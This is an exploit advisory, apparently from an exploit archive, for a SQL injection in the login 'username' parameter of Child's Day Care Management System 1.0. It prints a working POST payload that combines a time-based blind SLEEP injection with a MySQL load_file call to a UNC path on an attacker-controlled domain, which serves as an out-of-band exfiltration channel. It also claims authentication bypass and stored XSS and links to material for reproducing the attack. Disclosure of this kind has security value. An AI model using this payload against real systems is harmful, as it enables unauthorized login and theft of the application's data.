## https://sploitus.com/exploit?id=PACKETSTORM:165325
## Title: Child's Day Care Management System 1.0 SQL - Injection
## Author: nu11secur1ty
## Date: 12.16.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html
## Description:
The `username` in Login.php app, parameter from Child's Day Care
Management System 1.0 appears to be vulnerable to SQL injection
attacks.
The payload '+(select
load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'
was submitted in the username parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. Also, this system is vulnerable to
SQL-Injection-Bypass-Authentication
and XSS-Stored attacks. The attacker can be receiving all information
from the system by using these vulnerabilities! Status: CRITICAL
[+] Payload:
```mysql
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=zCAMOHlX'+(select
load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''
AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND
'wBYn'='wBYn&password=a6O!j4g!Z5
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)
## Proof and Exploit:
[href](https://streamable.com/tvbuoi)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>